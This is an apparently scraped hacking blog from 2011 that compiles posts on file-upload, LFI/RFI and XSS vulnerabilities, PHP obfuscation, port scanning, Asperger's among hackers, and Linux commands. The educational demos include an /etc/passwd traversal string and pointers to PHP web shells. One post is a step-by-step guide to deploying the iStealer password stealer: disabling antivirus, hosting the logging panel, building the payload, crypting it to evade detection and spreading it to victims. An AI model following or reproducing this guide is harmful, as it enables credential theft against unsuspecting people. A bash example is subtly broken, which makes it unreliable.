Connect With Me In Facebook

Add me as Friend on Facebook!
Welcome to DefendHackers, If u want to Apply for a Blogroll as a Author , With h4ckfreak Mail me @ suren.click@gmail.com

Mark Zuckerberg tells 8th graders “there’s no shortcuts” and to make friends

By h4ckfreak

Metasploit Quick Start Referennce Guide

Metasploit Quick Start Referennce Guide , By h4ckfreak

IP Security

IP Security By H4ckfreak.

15 Network Admin Apps for Android

15 Network Admin Apps for Android , By h4ckfreak

Break All OS Passwords Using KON

Break All OS Passwords Using KON , By h4ckfreak

Recover Or Reset Ur Windows Pwd Using Ubuntu

Recover Or Reset Ur Windows Pwd Using Ubuntu , By h4ckfreak

Security Blueprint For Ethical Hackers..

By h4ckfreak

Blocking IP Using IPSec

By h4ckfreak

Preventing DDos Attacks, Combat Steps abd Tools...

By h4ckfreak

Monday, December 19, 2011

Basics of Arbitary File Upload

Monday, December 19, 2011  h4ckfreak  No comments

As the name suggests Arbitrary File Upload Vulnerabilities is a type of vulnerability which occurs in web applications if the file type uploaded is not checked, filtered or sanitized.

The main danger of these kind of vulnerabilities is that the attacker can upload a malicious PHP , ASP etc. script and execute it. The main idea is to get the access to the server and execute desired code. for example an Attacker who have gained access to such kind of vulnerability can upload a malicious shell script and further can control the machine to execute desired commands, which would lead to a full compromise of the server and the victim’s server gets owned.

In this tutorial we’ll be looking at a a basic example of a Vulnerable Script and How to exploit it. So let’s get started.

Proof of Concept



For the demonstration of a realistic scenario, I have created a basic vulnerable PHP script.

Upload.php
Code:
<?php
   
  /**
   * @author lionaneesh
   * @copyright 2011
   * @page upload.php
   */
   
  // If the upload request has been made , Upload the file
   
  $uploadMessage = "";
   
  if (isset($_POST['upload']))
  {
        $path = $_FILES['uploadFile']['name'];
        if(move_uploaded_file($_FILES['uploadFile']['tmp_name'],$path) == TRUE)
        {
              $uploadMessage = "File Uploaded <a href='$path'>HERE</a>";
        }
  }
   
  ?>
   
  <html>
   
  <head>
   
      <title>Welcome to Vulnerable Apps</title>
   
  </head>
   
  <body>
   
  <h1>Arbitary file upload ( POC )</h1>
  <hr />
   
  <p>Hey all this is a sample php script to upload image files , This script doesn't contains file type checking code which makes it prone to Arbitary file upload vulnerbility. </p>
   
  <hr />
  <h2>Upload</h2>
  <hr />
   
  <table>
  <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" enctype="multipart/form-data">
      <tr>
      
          <td width="100">Upload File </td>
          <td width="380"><input class="cmd" type="file" name="uploadFile"/></td>
          <td><input style="margin-left:20px;" type="submit" name="upload" class="own" value="Upload"/></td>
      
      </tr>
  </form>
  </table>
  <?php
   
  echo $uploadMessage;
   
  ?>
   
  </body>
   
  </html>
In the above script we simply ask the user to input the file to be uploaded and without even checking what the file-type is or its extension we upload it.

This is a basic example of how these bugs occur.

How to exploit it



Now to exploit this common bug is yet simpler, the hacker can simply download any Web Shell-Scripts , Written in PHP , ASP etc.

Some PHP Shells :-

Ani-Shell
[ R57 Shell
C99 Shell

Note: These shells are not intended to be used as this way, author is not responsible for the way in which the user uses it.

Now to exploit this vulnerability the hacker have to carry out some steps :-

Upload the Shell



Go to the link



Gain Access



That's it for this tutorial stay tuned for more.

Tell the World ...

Read More

Basics of LFI and RFI Attacks

Monday, December 19, 2011  h4ckfreak  No comments



Local File Inclusion ( LFI ) is a method of including files on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like , include() , require() etc.) . Mostly these attacks are accompanied by Directory Transversal attacks which can reveal some sensitive data leading to further attacks.

Now that’s quite a bit of theory there let’s have a look on a sample vulnerable application.

Demonstration [Proof of Concept]



I have created a pair of files named index.html and lfi.php
lfi.php
Code:
<html>
   <head>
   <title>Vulnerable to LFI -- by lionaneesh</title>
  </head>   
  <body>
   
   <h1>Welcome to this Website</h1>
   
  <?php $page = isset($_GET['page']) ? $_GET['page'] : 'index.html'; ?>
   
   <p>You are currently at <?php echo"<a href='$page'>$page</a>";?></p>
   
   <?php include($page); ?>
   </body>
  </html>
As you see the above code has a include(USER_INPUT) So basically we can input any filename and it will simply print out the contents on the screen. This is the most popular form in which these bugs occur.
index.html
Code:
<p>Hello I am a sample page my name is index.html</p>
Providing normal Input:-
First let’s try and give this app a normal input which it would be expecting.

Input: index.html
Output:-
Code:
Welcome to this Website

  You are currently at index.html
  Hello I am a sample page my name is index.html
It works fine! Now let’s construct the attack string and see what happens!


Constructing the attack string

As I am working on UNIX we’ll print out the contents of /etc/passwd file , The file /etc/passwd is a local source of information about users' accounts.

My present working directory is /var/www/ , So what I have to do is :-
  1. Go back 2 directories and
  2. Then go to /etc/passwd
We can go back 2 directories using ‘../../’

Attack string :-

Code:
../../etc/passwd
Now lets feed this as an input and see what happens.

Input: “ ../../etc/passwd”

Code:
Welcome to this Website

  You are currently at ../../etc/passwd 
  root:x:0:1:Super-User:/root:/sbin/sh 
daemon:x:1:1::/: 
bin:x:2:2::/usr/bin: 
sys:x:3:3::/: 
adm:x:4:4:Admin:/var/adm: 
lp:x:71:8:Line Printer Admin:/usr/spool/lp: 
uucp:x:5:5:uucp Admin:/usr/lib/uucp: 
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/
And voila! We just printed the /etc/passwd file.

Remote File Inclusion



RFI is an abbreviation for Remove File Inclusion and is quite similar to LFI, Remote File Inclusion ( RFI ) is a method of including Remote files(present on another server) on a server through a Modified Special HTTP request. This vulnerability can be exploited using a Web Browser and thus can be very easy to exploit. The vulnerability occurs when a user supplied data without sanitizing is provided to an ‘inclusion type’ (like, include (), require () etc.)

Demonstration [Proof of Concept]



We’ll be using the same sample web-app we used to Demonstrate LFI

Constructing the attack string:-

In our case we want to include go4expert’s index file in our local file.

So what we have to do is, simply provide the URI as an input and see what happens

Input : http://go4expert.com

Output (page source):-
Code:
<html>
<head>
                       <title>Vulnerable to LFI -- by lionaneesh</title>
 </head>

 <body>

 <h1>Welcome to this Website</h1>

  <p>You are currently at <a href='http://go4expert.com'>http://go4expert.com</a>

</p> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head>         <meta http-equiv="Cache-Control" content="no-cache" />        <meta http-equiv="Pragma" content="no-cache" />
        <meta http-equiv="Expires" content="0" />  
<title>Programming and SEO Forums </title> 

<!-- ChartBeat -->

<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>

<!-- /ChartBeat --> 

 --------Sniped-----------


Note: In most modern ‘php.ini’ files, allow_url_include is set to off which would not allow a malicious user to include a remote file.
Read More

Basics of XSS, How the Logic Works

Monday, December 19, 2011  h4ckfreak  No comments


Cross Site Scripting also known as XSS is a popular type of Client Site Attack, It is a type of attack which occurs in Web-Applications and allows an attacker to inject desired client-side scripts into Web-Pages viewed by others.

Types of XSS



This attack is mainly of 2 types

Non-Persistent

This type of attack is carried out by injecting some client side code in a Vulnerable URL. Now further the Attacker can spread this URL and send it to his/her victims by means of some social engineering etc , on clicking these links the Victims Unknowingly executes the injected code , Which in turn can result in Cookie stealing , Privacy Disclosure etc.

Persistent

This type of Attack is more dangerous and it occurs when the data provided by the attacker is stored by the server, which is viewed as a normal page to the normal users.
Now Further the Attacker can simply inject some malicious Client Side Code which in turn can result in Defacement of the Website, Cookie Stealing, and Privacy Disclosure etc.

Demo



Now that we know something about what are these type of vulnerabilities and how they occur let’s actually take a look at how these vulnerabilities occur How to test it!
Xss.php
Code: php
<html>
<head>
    <title>Vulnerable to XSS</title>
</head>
</html>
<body>
<h1>Welcome to XSS Demo Page</h1>

<p>The Data Entered is As Follows :- </p>

<?php

/**
 * @author lionaneesh
 * @copyright 2011
 */
 

if(isset($_GET['data']))
{
    $data = $_GET['data'];
}
else
{
    $data = "No Data Entered !";
}

echo "<i>$data</i>";

?>

</body>

Now Just Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Wow! An Alert box saying XSS will appear proving that your injected code actually executed! Now this is just an example of how these vulnerabilities can occur in web-applications and how you can test them!

How to Fix Them



If you’re one of the people whose site is vulnerable to this type of attack I recommend fixing it as soon as possible, For the scope of this tutorial I’ll be only covering on how these vulnerabilities can be fixed in PHP , If you are using some other language , I recommend you to check your Language Reference or Contact Me .

PHP Provides a function called htmlspecialchars() which converts the chars into their HTML entities. Now we’ll just use this in the above code and check what happens.
Xss.php (line number 33)
Code: php
echo htmlspecialchars("<i>$data</i>");
Now let’s once more Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Voila! U can notice the change now!

That’s all for this tutorial stay tuned for more

For advanced reading click here

Thanks,

Greyhat

Read More

Obfuscating PHP

Monday, December 19, 2011  h4ckfreak  1 comment


I must say that hiding or obfuscating is not the most effective ways of security but it’s still effective to keep a Script Kiddy confused about what actually you are using in your server.

As an example - Server may use vulnerable version of PHP, with a public exploit released at some underground markets, Most of the time a simple automated exploit is released to help the “Point-Click-Hackers” (Script Kiddies). Now all they have to find is which Version of PHP you are using and if it is vulnerable, Point the exploit, launch it and own your system. In these cases obfuscating can really help you a lot.

By PHP obfuscation you can hide PHP, Which means you can stop or slow down a hacker attacking your machine.

In this tutorial, we’ll be looking at some of the most popular methods used by Site Administrators to Hide PHP , So let’s get started.

Editing php.ini file



PHP as a default exposes the fact that if it is installed on a server or not, by adding its signature to the Web server header which can really be lethal in some cases.

To set this off , Simply go to your php installation directory under “conf_files” , you can find your standard PHP Configuration file named “php.ini”

Now under this file , go to the “Miscellaneous” section and simply turn expose_php to Off.

Spoofing



By adding a simple line of code you can actually fool an attacker about what service are you using.

Spoof.php
Code: php
<?php
error_reporting(0);
header("X-Powered-By: My Programming Language");
?>
Note: The header call should be made before you send any data to the client.

Using Some Basic Apache Rules



Most Web servers like Apache etc. Can be configured to use some basic rules that would allow to parse different file-types with PHP.

EG:-

A file like index.php, gives a straight clue to the attacker that the server is using php. But if we can use some basic server configuration to actually allow a extension like “.mpl” etc to parse PHP code. The attacker will certainly have no clue about the file extension.

For the Scope of this tutorial I’ll only be covering some Apache Rules/Configurations, but if you need help with some other servers, feel free to comment or PM me.

The configurations can be added either using the .htaccess directive or directly through the Apache Configurations file. Just add the following set of rules

Syntax :-
Code:
AddType application/x-httpd-php .extenstion
Example :-
Code:
AddType application/x-httpd-php .mpl .mp3 .py .asp
Note : Only use those extensions which are normally not used by the server , for example don’t use .txt extension as the server will interpret .txt as PHP code and if it contains some php , it will be executed.

Conclusion



Obfuscation is not the most effective way of security and at most of the times, it doesn’t help, as a professional hacker would already know these modifications and can easily make out what you are trying to hide. But obfuscation would really slow down the attacker and will keep away some script kiddies. It is better to obfuscate than rather telling him what he wants.
Read More

Tuesday, December 13, 2011

The GREAT FIRE"WALL" Of China

Tuesday, December 13, 2011  h4ckfreak  No comments


Read More

Monday, December 12, 2011

Hack Passwords Using iStealer

Monday, December 12, 2011  h4ckfreak  4 comments

There are diffirent way's to steal passwords.
I want to be able to steal passwords from cookie files with 1 click,


well what do you know it exists! It's a cookie stealer called iStealer ( 6.0 is newest version ).
It steals every cookie password from the slave's browser, and shows it to the attacker.
So if you do it correctly you will have hotmail, netlog, facebook, WoW, rapidshare and other passwords from lots of people in no time.

I'll set one up, and will go thru all the details.

Prepare yourself

1st Download iStealer 6.0 ( link is at the bottom of the thread )

2th Disable your virusscanner, this is because your antivirus sees the iStealer program as a keylogger ( it's acctualy a CookieStealer but whatever )

3th Register domain and hosting
iStealer requires a webserver, this is because when someone click's your own made "Virus" it has to send the passwords and usernames somewhere.
I suggest http://www.000webhost.com/ for free webhosting, so register a domain there.

The registration can take a while, but when u have your domain registered, go to the cPanel.
Once your on the cPanel, click on MySQL ( this is under the tab "Software / Services" )

Now create a new database and user. Something like this

MySQL database name: a7356028_stealer
MySQL user name: a7356028_theadmin
Password for MySQL user: 123456
Then click create database.

Configure to steal

Now extract the downloaded zip file ( below the thread ).
You should have iStealer 6.0.exe, and a map called PHP Logger.
Open index.php in the map PHP Logger with notepad or any text-editor.

you see a bunch of codes, but dont worry, we only need the first part of the php file. Search for the CONFIGURATION section, this will be in it

$dbHost = "localhost"; // MySQL host
$dbUser = "suicide_admin"; // MySQL username
$dbPass = "GOX"; // MySQL password
$dbDatabase = "suicide_is"; // MySQL database name

$username = "admin"; // Login Username
$password = "GOV"; // Login Password
$logspage = 100; // Number of logs per page

Configure this with you own MySQL database information. Then it should look like this

$dbHost = "localhost"; // MySQL host
$dbUser = "a7356028_theadmin"; // MySQL username
$dbPass = "123456"; // MySQL password
$dbDatabase = "a7356028_stealer"; // MySQL database name

$username = "admin"; // Login Username
$password = "whatuwant"; // Login Password
$logspage = 100; // Number of logs per page

Note that the $username and $password variable will be used to log in your website, so choose it carefully.

Now save the file.

Loading it up
Go back to the cPanel of your site, and click on File Manager ( under the tab "Files )
Log in with your 000webhost password and continue.
Click on public_html map, and once ur in it, click Upload.
Select the index.php you saved before, and the style.css

Upload it.

Then just browse to your domain name in your browser, and login with the $username and $password you choose in the index.php ( in my case admin and whatuwant ). Now you have the page where the passwords and usernames are stored.

Making the Stealer File!

Now everything is set up, we have to make our CookieStealer file.
Just open iStealer 6.0.exe, enter your domain on the top ( edit things you want, like changing the icon etc ).

Click build!

Testing, crypting, spreading?

Testing?

To see if it works, just click it yourself! If you enter your website, and see your passwords and usernames, it works!


Crypting?

Well, it worked on yourself, because your antivirus is not up, but most of the people have antivirusscanner on all the time, so you might think of crypting it ( making it undetectable ), i'll talk about this later ( and show u some tools ), in the main time, use Google!

Spreading?

Just make a torrent file with your File in it ( With a combine tool - Google it ).
Or just go to the computer of your friends, shut down their antivirus ( if your file isn't crypted ), and click the file.

Dont spread, it's illegal.






If the link broken , Google for iStealer 6.0 (Files tube Or Mediafire)
Read More

Types Of Port Scanning , Reference

Monday, December 12, 2011  h4ckfreak  No comments

Port numbers are 16-bit unsigned numbers and can be broadly classified into three categories.
Port 0-1023 is "well known ports",
1024 - 49151 are "registered ports"
and 49152 - 65535 is "dynamic or private ports".


One problem with port scanning is that it is effortlessly logged by the services listening at the scanned ports. This is because they detect an incoming connection, but do not receive any data, thereby generating an application error log.

To scan UDP ports, an empty UDP datagram is sent to the port. If the port is listening, the services will send back an error message or ignore the incoming datagram. If the port is closed, the operating system send back "ICMP Port Unreachable" (Type 3) message.

(Remember Windows Uses ICMP To find the Host is alive Or Dead , Linux Uses UDP packets to do the same)


Port scanning can be broadly classified into:
  • Open scan
  • Half-open scan
  • Stealth scan
  • Sweeps
  • Misc
If ur a Beginner u may be wondering What ype of scan can i go for ??It Completely  depends on the information gathering during reconnaissance regarding the type of network topology, IDS and other logging feature present on the system.

So to be in the Safer Side i have got some links which tells u the logic Behind Each type of Scan , Click Here to Know the Packet Informations

Open Scan

Open scan / TCP connect scan also known as vanilla scan where a full connection is opened to the target system by a three-way TCP/IP handshake. Therefore, it is easiest to be detected and blocked on the network. However the information gathering using open scan is usually the most.
When the port is open, the client sends a SYN flag, the server replies a SYN+ACK flag, which is acknowledged back with an ACK flag by client. Once the handshaking is completed, the connection is terminated by the client. This confirm an open port.
When the port is closed or "not listening" the server response a RST+ACK flag, which is acknowledged back with an RST flag by client, and then the connection is closed.
The disadvantage of this scan technique is that the attacker cannot spoof his identity as spoofing would require sending a correct sequence number as well as setting the appropriate return flags to setup data connection. Moreover, most stately IDS and firewall detect and log this scan, exposing both the attempt and the attacker's IP. The advantage is fast accurate scan that require no additional privilege.

Half-Open Scan

In half-open scan, a complete TCP connection is not established. Instead as soon as the server acknowledge with a SYN+ACK response, the client tears down the connection by sending RST flag. This way, the attacker detect an open port and not establish full connection.


However, some sophisticated IDS and firewall can detect a SYN packet from the void and prevent such scan. Besides, this scan require attacker to make a customer IP packet which in turn requires access to SOCK_RAW (getprotbyname('raw') under most system) or /dev/bpf (Berkeley packet filter), /dev/nit (Sun network interface tap). This requires priviliege access.


Stealth Scan


Initially half open scans were considered stealth, however as IDS software evolved, these scan were easily logged. Now, stealth scan refers to the type of scan where packets are flagged with a particular set of flags other than SYN, or a combination of flags, no flag set, with all flag set, appearing as normal traffic, using fragmented packet or avoiding filtering devices by any other means. All these techniques resort to inverse mapping to determine open ports.
  • SYN|ACK Scan
    Client sends a SYN+ACK flag to the target. For a closed port, server will reply a RST response while an open port will not reply. This is because the TCP protocol requires a SYN flag to initiate the connection. This scan may generate certain amount of false positives. For instance, packets dropped by filtering devices, network traffic, timeouts etc can give a wrong inference of an open port while the port may or may not be open. However this is a fast scan that avoid three-way handshake.
  • FIN Scan
    Similar to SNY|ACK scan, instead a FIN flag is sent to the target. The closed ports are required to reply to the probe packet with RST, while open ports must ignore the packet in question. This scan attempt to exploit vulnerabilities in BSD code. Since most OS are based on BSD or derived from BSD, this was a scan that can return good result. However, most OS applied patches to correct the problem, still there remains a possibility that the attacker may come across one where these patches have not be applied.
  • ACK Scan
    The scan take advantage of the IP routing function to deduce the state of the port from the TTL value. This is based on the fact that IP function is a routing function. Therefore TTL value will be decremented by on by an interface when the IP packet passes through it.
  • NULL Scan
    In NULL scan, the packet is sent without any flag set. This takes advantage of RFC 793 as the RFC does not specify how the system should respond. Most UNIX and UNIX related system respond with a RST (if the port is open) to close the connection. However, Microsoft's implementation does not abide with this standard and reacts differently to such scan. An attacker can use this to differentiate between a Windows machine and others by collaborating with other scan results. For example, if -sF, -sX or -sN scan shows all ports are closed, but a SYN (-sS) scan shows ports are opened, the attacker can infer that he is scanning a windows machine. This is not an exclusive property though, as this behavior is also shown by Cisco, BSDI, HP/UX, MVS and IRIX. Also note that the reserved bits (RES1, RES2) do not affect the result of any scan. Therefore this scan will work only with UNIX and related systems.
  • Xmas Scan
    In Xmas scan, all flags are set. All the available flags in the TCP header are set (ACK, FIN, RST, SYN, URG, PSH) to give the scan an ornamental look. This scan will work on UNIX and related systems and cause the kernel to drop the packet if the receiving port is open.
  • TCP Fragmenting
    This approach is evolved from the need to avoid false positive arising from other scans due to packet filtering device. For any transmission, a minimally allowable fragmented TCP header must contain a destination and source port for the first packet (8 octet, 64 bit), the initialized flags in the next, which allows the remote host to reassemble the packet upon receipt through an internet protocol module that identifies the fragmented packets by the field equivalent values of source, destination, protocol and identification.
    The scan works by splitting the TCP header into small fragments and transmitting it over the network. However, there is a possibility that IP reassembly on the server-side may result in unpredictable and abnormal results - such as fragmentation of the data in the IP header. Some hosts may be incapable of parsing and reassembling the fragmented packets and thus may cause crashes, reboots or even network device monitoring dumps.
    Some firewalls may have rulesets that block IP fragmentation queues in the kernel (like the CONFIG_IP_ALWAYS_DEFRAG option in the Linux kernel) - though this is not widely implemented due to the adverse affect on performance. Since several intrusion detection systems use signature-based mechanisms to signify scanning attempts based on IP and/or the TCP header, fragmentation is often able to evade this type of packet filtering and detection. There is a high possibility of causing network problems on the target network.
Miscellaneous
  • FTP bounce
    This scan takes advantage of the FTP servers with read/write access. The advantage of this scan can be both anonymity and accessibility. Suppose the target network allows FTP data transfer from only its recognized partners. An attacker might discover a service business partner who has a FTP service running with a world-writable directory that any anonymous user can drop files into and read them back from. It could even be the ISP hosting services on its FTP server. The attacker, who has a FTP server and able to run in passive mode, logs in anonymously to the legitimate server and issues instructions for scanning or accessing the target server through a series of FTP commands. He may choose to make this into a batch file and execute it from the legitimate server to avoid detection.
    If a connection is established as a means of active data transfer processing (DTP), the client knows a port is open, with a 150 and 226 response issued by the server. If the transfer fails a 425 error will be generated with a refused build data message. The PASV listener connection can be opened on any machine that grants a file write access to the attacker and used to bounce the scan attack for anonymity. It does not even have to be an FTP server, any utility that will listen on a known TCP port and read raw data from it into a file will do.
    Often these scan are executed as batch files padded with junk so that the TCP windows are full and the connection stay alive long enough for the attacker to execute this commands. Fingerprinting the OS scan help determine the TCP window size and allow the attacker to pad this commands for further access accordingly.
    This scan is hard to trace, permits access to local network and evades firewalls. However, most FTP servers have patched this vulnerability by adopting countermeasures such as preventing third party connection and disallowing listing of restricted ports. Another measure adopted has been restrict write access.
  • UDP scan
    The disadvantage to the attacker is that UDP is a connectionless protocol and unlike TCP does not retransmit packet if they are lost or dropped on the network. Moreover, it is easily detected and unreliable (false positive). Linux kernel limit ICMP error message rates with destination unreachable set to 80 per 4 seconds, thereafter implmenting a 1/4 second penalty if the count is exceeded. This makes the scan slow and moreover the scan requires root access. However it avoids TCP based IDS and can scan non-TCP ports.
Ethical Hacker and Scanning Tools
The most important is knowledge itself. The result of a scanner can be misleading if the ethical hacker does not have good knowledge of common vulnerabilities. Relying solely on the scanning tool to all threats is not practical as the author of the vulnerability check may have written it incorrectly. It is also likely that it was created in a controlled environment and might not work as well in the open.
Besides, performing exhaustive scan against the system in a large enterprise is usually not feasible due to network constraints, stability of the backbone and scanned systems. Another view point is that scanner does not have an internal view of the host audited and can miss critical misconfiguration that result in an insecure setup, but appear "secure" from the outside with automation
Read More

Wednesday, November 23, 2011

Most Security Proffesional Has ASPERGER Syndrome, Even Adrian Lamo Has it

Wednesday, November 23, 2011  h4ckfreak  No comments



Last month Adrian Lamo(Who is Adrian Lamo), a man once hunted by the FBI, did something contrary to his nature. He says he picked up a payphone outside a Northern California supermarket and called the cops.
Someone, Lamo says, had grabbed his backpack containing the prescription anti-depressants he’d been on since 2004, the year he pleaded guilty to hacking The New York Times. He wanted his medication back. But when the police arrived at the Safeway parking lot it was Lamo, not the missing backpack, that interested them. Something about his halting, monotone speech, perhaps slowed by his medication, got the officers’ attention.
An ambulance arrived. “After a few moments of conversation, they just kind of exchanged a look and told me to get on the stretcher,” says Lamo.

[Update : We've clarified the headline of this story, and modified the text to clearly attribute the above details to Lamo. Since reporting this story, we've learned from police that Lamo's initial hospitalization in April 2010 came after Lamo's father phoned the Sacramento County Sheriff's department three times in as many days to report that Lamo was over-medicating with his prescription drugs, which may have had a profound impact on his speech and coordination. The Sheriff's office was unable to find a record of Lamo phoning the police himself. Lamo stands by his original explanation of the incident.]
Thus began Lamo’s journey through California’s mental health system — and self discovery. He was transported to a local emergency room and put under guard, and then transferred to the Woodland Memorial Hospital near Sacramento, where he was placed on a 72-hour involuntary psychiatric hold under a state law allowing the temporary forced hospitalization of those judged dangerous or unable to care for themselves. As the staff evaluated him and adjusted his medication, a judicial officer extended his stay, and three days became nine.
When Lamo was finally discharged to his parents’ house on May 7, he left the hospital with a new diagnosis. At 29 years old Lamo learned he has Asperger’s Disorder.

“It’s kind of a surprise that it took me until almost 30 to find I had a particular disorder and get proper treatment for it,” Lamo says.


Sometimes called the “geek syndrome",(Click Me to Find More About Geek Syndrome)” Asperger’s is a mild form of autism that makes social interactions difficult, and can lead to obsessive, highly focused behavior.
There are no reliable figures on how many people have Asperger’s, but anecdotally a lot of them are drawn into the computer field, particularly the logic-heavy world of coding. BitTorrent creator Bram Cohen has diagnosed himself with the disorder, and Microsoft founder Bill Gates is frequently speculated to have it.
Also anecdotally, people with Asperger’s are frequently diagnosed in adulthood, even into their 50s, according to the U.S. Autism and Asperger’s Association. As in Lamo’s case, the diagnosis often follows a run-in with the police, says Dennis Debbaudt, an independent consultant who trains law enforcement agencies on interacting with people on the autistic spectrum.
“They may be living a life where people think they’re odd, they’re unusual, they’re eccentric, whatever you want to call it,” says Debbaudt. “But nobody’s thinking, ‘Oh, by the way, I think they have Asperger’s Syndrome.’ It’s not something that would pop into the mind of the general person or law enforcement. It’s just, ‘There’s something different here. This person communicates different. His body language is different.’”
The Asperger’s diagnosis, though, didn’t come as a complete surprise to Lamo or his family — the therapist Lamo had been seeing for depression had already suggested he visit a specialist to be evaluated for Asperger’s. Now, the new medication prescribed in Woodland has made a positive change in his interactions with other people.
“Talking to strangers was really hard for me,” Lamo says. “I had to script it all in my head and act out normal behaviors in a very conscious way. Essentially, I had to learn how human beings act.”



Adrian Lamo at the home of his parents in Carmichael, California, five days after his release from an involuntary psychiatric hold.
“Now I no longer feel there’s a surface tension that I have to break through when I talk to somebody, like I’m a fish going after a particularly tasty bug and I have to break through the water to get it,” he continues. “I just talk to somebody, like it’s a natural function.”
To a reporter who’s been covering Lamo for a decade, the diagnosis makes a layman’s instant, intuitive sense.
Lamo made his mark in the early 2000s with a string of brazen but mostly harmless hacks against large companies, conducted out in the open and with a striking naiveté as to the inevitable consequences for himself. In 2001, when he was 20, Lamo snuck into an unprotected content-management tool at Yahoo’s news site to tinker with a Reuters story, adding a made-up quote by then-Attorney General John Ashcroft.
Lamo’s other targets included WorldCom, Excite@Home and Microsoft; he alerted the press to each intrusion, and sometimes worked with the hacked company to close the security holes he’d exploited. Unemployed at the time, and prone to wander the country by Greyhound, he was given the appellation “the Homeless Hacker” by the media.
His hacking career ended around 2002, after Lamo penetrated the internal network of The New York Times and added himself to the paper’s database of op-ed contributors, putting himself in the virtual company of William F. Buckley Jr. and Jimmy Carter. The Times didn’t think it was funny, and the FBI and federal prosecutors in New York charged Lamo under the Computer Fraud and Abuse Act. He pleaded guilty in 2004, and was sentenced to six months of house arrest at his parents’ home in Carmichael, California, followed by two years of probation.
It was around that time that Lamo fell into a deep depression that has dogged him until last month. “I’d associated his depression with what had happened with the FBI,” says his father, Mario Lamo, who describes his son as having had a normal childhood. “As a child he would give speeches to people and entertain visitors and talk about a thousand things, and we didn’t notice anything irregular,” he says.
But as a teenager, Lamo began struggling in social situations. Since his discharge from Woodland, “I’ve noticed an incredible difference,” says the senior Lamo.
Lamo joins a growing list of computer intruders who’ve been diagnosed with Asperger’s, though usually the diagnosis comes when the hacker faces the criminal justice system for the first time, rather than six years later.
In December, a defense psychiatrist concluded that credit card thief Albert Gonzalez exhibited behavior consistent with Asperger’s. A government-appointed psychiatrist rejected the claim, and Gonzalez got 20 years. Earlier, in August, a Los Angeles computer intruder involved in a lucrative fraud scheme received a slightly reduced sentence because of his Asperger’s, which his lawyer argued made him vulnerable to manipulation by the ringleader in the scheme.
In the most high-profile case, the British hacker Gary McKinnon was diagnosed with Asperger’s at the age of 42, shortly after losing a legal challenge to an extradition order that would have sent him to America to face charges of sabotaging unclassified Pentagon computers. The diagnosis opened new legal avenues for McKinnon, who now appears likely to avoid extradition.
For his part, Lamo thinks Asperger’s might explain his knack for slipping into corporate networks — he usually operated with little more than a web browser and a lot of hunch work. “I have always maintained that what I did isn’t necessarily technical, it’s about seeing things differently,” he says. “So if my brain is wired differently, that makes sense.”
But he scoffs at the notion that Asperger’s should mitigate the consequences of illegal behavior. Asperger’s might help explain his success in hacking, but not his willingness to do it, he says. “If, in fact, the diagnosis is accurate, it had zip to do with my actions at that time.”
While Lamo thinks he shouldn’t have been confined against his will, he says most of the hospital staff were well-intentioned and professional, and he’s been happier since the incident. “Many of them were beautiful people who had a great deal of genuine concern for their patients, and I feel that I benefited from their attention,” he says.
He tried to help them, as well. After the staff discovered his hacking past, they began seeking him out for computer advice. “The questions changed from, ‘Do you know where you are? What’s today’s date?,’ to, ‘Hey, I have a Mac.”
“They also untaped the login and password from the state mental health-database terminal at a nurse’s station,” he adds.
Today, he says, “I feel less sedated, more social, and I feel better able to carry out the day-to-day functions of the average member of society.
“I still can’t say if the situation were to be repeated back at the Safeway, that they wouldn’t look at me and say, ‘Yeah, yeah, better get him in.’”


i Guess i have it ..!! Check with yours with the Facts, I Confirmed after reading Wikipedia Article Chek em Out:


Asperger Syndrome

Happy Hacking & Keep Hunting


Read More

Friday, October 21, 2011

Create a User Acc Using Bash Script in Linux

Friday, October 21, 2011  h4ckfreak  2 comments




These two scripts are very important for the system admin who regularly works with mail servers and somehow forgets to backup his system username and password! Let’s say somehow we lost the usernames and passwords of the mail server. In this case the admin has to manually create all the users and then change the passwords for all the users. Tedious job. Let’s make our life easier.

 Before we jump in , For those who dont who kno what Bash file and how to create that ? click the link for refrence  Bash Guide

First create a file which contains all the user name. Something like this:
INFILTRATOR
SUREN GREY HAT
WILL MATHEWS
jOSHUSA
pHIL 
Risab Dang




Save the file as userlist.txt. Now create the following bash file:


#!/bin/sh
for i in `more userlist.txt `
do
echo $i
adduser $i
done
Save the file and exit.
chmod 755 userlist.txt





ow run the file:
./userlist.txt
This will add all the users to the system. Now we have to change the passwords. Let's say we want username123 as password. So for user SUREN GREY HAT the password will be suren123, rubi123 for user rubi and so on.


Create another bash file as follows:
#!/bin/sh
for i in `more userlist.txt `
do
echo $i
echo $i"123" | passwd –-stdin "$i"
echo; echo "User $username’s password changed!"
done
Run the file. All the passwords are changed.


Thanks

Read More

Linux Commands For Beginners

Friday, October 21, 2011  h4ckfreak  No comments



This short guide shows some important commands for your daily work on the Linux command line.

arch

Outputs the processor architecture.
$ arch
i686

cat

Outputs the contents of a file.
$ cat lorem.txt
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

cd

Change the working directory.
$ cd /bin

chgrp

Change group ownership of files.
$ chgrp games moo.txt

chmod

Change access permissions of files.
$ chmod +x helloworld

chown

Change file owner and group.
# chown root lorem.txt

cksum

Print CRC checksum and byte counts of each file.
$ cksum lorem.txt moo.txt
3570240675 453 lorem.txt
4294967295 0 moo.txt

cp

Copies a file.
$ cp lorem.txt copy_of_lorem.txt

date

Outputs the current date and time.
$ date
Sat Mar  3 12:07:09 GMT 2007

df

Reports the amount of disk space used and available on filesystems.
$ df
Filesystem           1K-blocks      Used Available Use% Mounted on<br>
/dev/simfs            39845888    218048  39627840   1% /

dir

List directory contents.
$ dir
